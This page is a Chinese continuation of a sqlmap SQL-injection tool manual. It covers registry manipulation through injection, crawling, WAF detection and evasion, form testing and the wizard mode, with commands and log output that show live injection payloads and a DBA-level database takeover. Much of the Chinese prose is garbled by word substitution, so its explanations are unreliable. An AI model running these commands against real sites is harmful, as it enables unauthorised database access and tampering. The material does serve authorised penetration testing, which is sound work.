|
|
|
联系客服020-83701501

sqlmap用户手册[续]

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
sqlmap用户手册[续]

《sqlmap用户手册》其实只写了大部分可能用到的参数,还有些并未写,这次补上~ 专程注:文中部分是– 而不是—— (这个不是我不高兴建改,而是web琐细的标题,实在赔罪,请巨匠在复制语句当前手工修改。:) )

ps:其实看到zone里很多问sqlmap的标题在通读看完那篇文章后都能操持。遗憾啊,此刻的人通读看文章的躁急都没有了,碰着了哪个标题就想起针对这个标题弥留,却不知道承当看完当前,以后或许省多少时间来弥留,吐槽结束,批注劈头劈脸:

对Windows注册表垄断


当数据库为MySQL,PostgreSQL或Microsoft SQL Server,而且当前web操作反对堆盘诘。 固然,当前连贯数据库的用户也须要有权限垄断注册表。

 

读取注册表值

参数:–reg-read

写入注册表值

参数:–reg-add

删除注册表值

参数:–reg-del

注册表辅助选项

参数:–reg-key,–reg-value,–reg-data,–reg-type

须要配合以前三个参数垄断,例子:

Default
1 $ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINESOFTWAREsqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

 

旧规参数


从sqlite中读取session

参数:-s

sqlmap对每一个目的屯子在output蹊径下被动生成一个SQLite文件,若是用户想指定读取的文件蹊径,就或许用这个参数。

生存HTTP(S)日记

参数:-t

这个参数须要跟一个文本文件,sqlmap会把HTTP(S)苦求与响应的日记生存到那里。

非交互形式

参数:–batch

用此参数,不须要用户输出,将会垄断sqlmap提示的默认值一直运行下去。

自愿垄断字符编码

参数:–charset

不垄断sqlmap被动识另外(如HTTP头中的Content-Type)字符编码,自愿指定字符编码如:

Default
12 --charset=GBK 

膝行爬行webURL

参数:–crawl

sqlmap或许收集匿伏的可能存在裂痕的连贯,后背跟的参数是膝行爬行的深度。

例子:

Default
123456789 $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3[...][xx:xx:53] [INFO] starting crawler[xx:xx:53] [INFO] searching for links with depth 1[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while[xx:xx:53] [INFO] searching for links with depth 2[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'[xx:xx:00] [INFO] 42/56 links visited (75%)[...]

 

规定输出到CSV中的合并符

参数:–csv-del

当dump生存为CSV样式时(–dump-format=CSV),须要一个合并符默认是逗号,用户也或许改成另外 如:

Default
1 --csv-del=";"

 

DBMS身份考证

参数:–dbms-cred

某些时候当前用户的权限不够,做某些垄断会新鲜新鲜,若是知道高权限用户的暗码,或许垄断此参数,有的数据库有特地的运行机制,或许切换用户如Microsoft SQL Server的OPENROWSET函数

定义dump数据的样式

参数:–dump-format

输出的样式可定义为:CSV,HTML,SQLITE

预估完成时间

参数:–eta

或许共计注入数据的残余时间。

比如Oracle的布尔型盲注:

Default
12345678 $ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta [...][hh:mm:01] [INFO] the back-end DBMS is Oracle[hh:mm:01] [INFO] fetching banner[hh:mm:01] [INFO] retrieving the length of query output[hh:mm:01] [INFO] retrieved: 6417% [========>                                          ] 11/64  ETA 00:19

 

然后:

Default
123456 100% [===================================================] 64/64[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod web application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: Oraclebanner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

 

sqlmap先输出长度,预计完成时间,发扬分析百分比,输出字符

变革session文件

参数:–flush-session

若是不想用以前缓存这个目的的session文件,或许垄断这个参数。 会清空以前的session,从新测试该目的。

被动获得form表单测试

参数:–forms

若是你想对一个页面的form表单中的参数测试,或许垄断-r参数读取苦求文件,梗概经过–data参数测试。 可是当垄断–forms参数时,sqlmap会被动从-u中的url获得页面中的表单进行测试。

忽略在会话文件中存储的盘诘后果

参数:–fresh-queries

忽略session文件生存的盘诘,从新盘诘。

垄断DBMS的hex函数

参数:–hex

偶然候字符编码的标题,可能招致数据丧失,或许垄断hex函数来防备:

针对PostgreSQL例子:

Default
123456789 $ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors [...][xx:xx:14] [INFO] fetching banner[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR:  invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled byGCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2[...]

 

自定义输出的蹊径

参数:–output-dir

sqlmap默认把session文件跟后果文件生存在output文件夹下,用此参数可自定义输长进径 比如:–output-dir=/tmp

从响应中获得DBMS的舛错动态

参数:–parse-errors

偶然目的没有封锁DBMS的报错,当数据库语句舛错时,会输出舛错语句,用词参数或许会显出舛错动态。

Default
1234567891011121314 $ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors[...][11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'[11:12:17] [INFO] target URL appears to have 3 columns in query[...]

 

另外的一些参数


垄断参数缩写

参数:-z

有垄断参数太长太复杂,或许垄断缩写形式。 比如:

Default
1 python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"

 

或许写成:

Default
1 python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"

 

还有:

Default
1 python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"

 

或许写成:

Default
1 python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"

 

胜利SQL注入时申饬

参数:–alert

设定会发的答案

参数:–answers

当祈望sqlmap提出输出时,被动输出巨匠想要的答案或许垄断此参数: 例子:

Default
123456 $ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch[...][xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N[...]

 

创造SQL注入时收回蜂鸣声

参数:–beep

创造sql注入时,收回蜂鸣声。

疏导式检测WAF/IPS/IDS护卫

参数:–check-waf

WAF/IPS/IDS护卫可能会对sqlmap形成很大的搅扰,若是嫌疑目的有此防护的话,或许垄断此参数来测试。 sqlmap将会垄断一个不存在的参数来注入测试

比如:

Default
12 &foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1 

若是有护卫的话可能前往后果会差异。

清算sqlmap的UDF(s)和表

参数:–cleanup

烧毁sqlmap注入时产生生机的udf与表。

禁用黑色输出

参数:–desable-coloring

sqlmap默认黑色输出,或许垄断此参数,禁掉黑色输出。

垄断指定的Google后果页面

参数:–gpage

默认sqlmap垄断前100个URL所在作为注入测试,松散此选项,或许指定页面的URL测试。

垄断HTTP参数传染

参数:-hpp

HTTP参数传染可能会绕过WAF/IPS/IDS护卫机制,这个对ASP/IIS与ASP.NET/IIS平台颇有效。

测试WAF/IPS/IDS护卫

参数:–identify-waf

sqlmap或许尝试找出WAF/IPS/IDS护卫,轻易用户做出绕过体神气式。目前大约反对30种产品的识别。

比如对一个受到ModSecurity WAF护卫的MySQL例子:

Default
12345678910111213141516171819202122232425262728 $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3[...][xx:xx:23] [INFO] testing connection to the target URL[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'[xx:xx:23] [DEBUG] page not found (404)[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')[...]

 

模仿智高手机

参数:–mobile

偶然就事端只接收移动端的访问,此时或许设定一个手机的User-Agent来模仿手机登陆。

比如:

Default
123456789101112 $ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile[...]which smartphone do you want sqlmap to imitate through HTTP User-Agent header?[1] Apple iPhone 4s (default)[2] BlackBerry 9900[3] Google Nexus 7[4] HP iPAQ 6365[5] HTC Sensation[6] Nokia N97[7] Samsung Galaxy S> 1[...]

 

平安的删除output目次的文件

参数:–purge-output

偶然须要删除后果文件,而不被复原,或许垄断此参数,原有文件将会被随机的一些文件掩盖。

比如:

Default
12345678910 $ python sqlmap.py --purge-output -v 3[...][xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...[xx:xx:55] [DEBUG] changing file attributes[xx:xx:55] [DEBUG] writing random data to files[xx:xx:55] [DEBUG] truncating files[xx:xx:55] [DEBUG] renaming filenames to random values[xx:xx:55] [DEBUG] renaming directory names to random values[xx:xx:55] [DEBUG] deleting the whole directory tree[...]

 

疏导式果断注入

参数:–smart

偶然对目的非常多的URL进行测试,为俭仆时间,只对梗概疾速果断为注入的报错点进行注入,或许垄断此参数。

例子:

Default
123456789101112131415161718192021222324252627282930313233 $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart[...][xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable[xx:xx:14] [INFO] skipping GET parameter 'ca'[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable[xx:xx:14] [INFO] skipping GET parameter 'user'[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic[xx:xx:14] [INFO] GET parameter 'id' is dynamic[xx:xx:14] [WARNING] reflective value(s) found and filtering out[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Ydo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable [xx:xx:14] [INFO] testing 'MySQL inline queries'[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable [xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[xx:xx:24] [INFO] target URL appears to have 3 columns in query[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable[...]

 

初级用户领导参数

参数:–wizard 面向初级用户的参数,或许一步一步教你如何输出针对目的注入。

Default
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172 $ python sqlmap.py --wizard     sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 11:25:26 Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1POST data (--data) [Enter for None]: Injection difficulty (--level/--risk). Please choose:[1] Normal (default)[2] Medium[3] Hard> 1Enumeration (--banner/--current-user/etc). Please choose:[1] Basic (default)[2] Smart[3] All> 1 sqlmap is running, please wait.. heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Ydo you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] YGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection points with a total of 25 HTTP(s) requests:---Place: GETParameter: id    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=1 AND 2986=2986     Type: error-based    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause    Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))     Type: UNION query    Title: Generic UNION query (NULL) - 3 columns    Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)--      Type: stacked queries    Title: Microsoft SQL Server/Sybase stacked queries    Payload: id=1; WAITFOR DELAY '0:0:5'--     Type: AND/OR time-based blind    Title: Microsoft SQL Server/Sybase time-based blind    Payload: id=1 WAITFOR DELAY '0:0:5'--     Type: inline query    Title: Microsoft SQL Server/Sybase inline queries    Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))---web server operating system: Windows XPweb application technology: ASP, Microsoft IIS 5.1back-end DBMS operating system: Windows XP Service Pack 2back-end DBMS: Microsoft SQL Server 2005banner:---Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)     Oct 14 2005 00:33:37     Copyright (c) 1988-2005 Microsoft Corporation    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)---current user:    'sa'current database:    'testdb'current user is DBA:    True [*] shutting down at 11:25:52

link:http://drops.wooyun.org/tips/401

本文由网络平安攻防研讨室(www.91ri.org)动态平安小组收集整顿,转载请阐明来由。

数安新闻+更多

证书相关+更多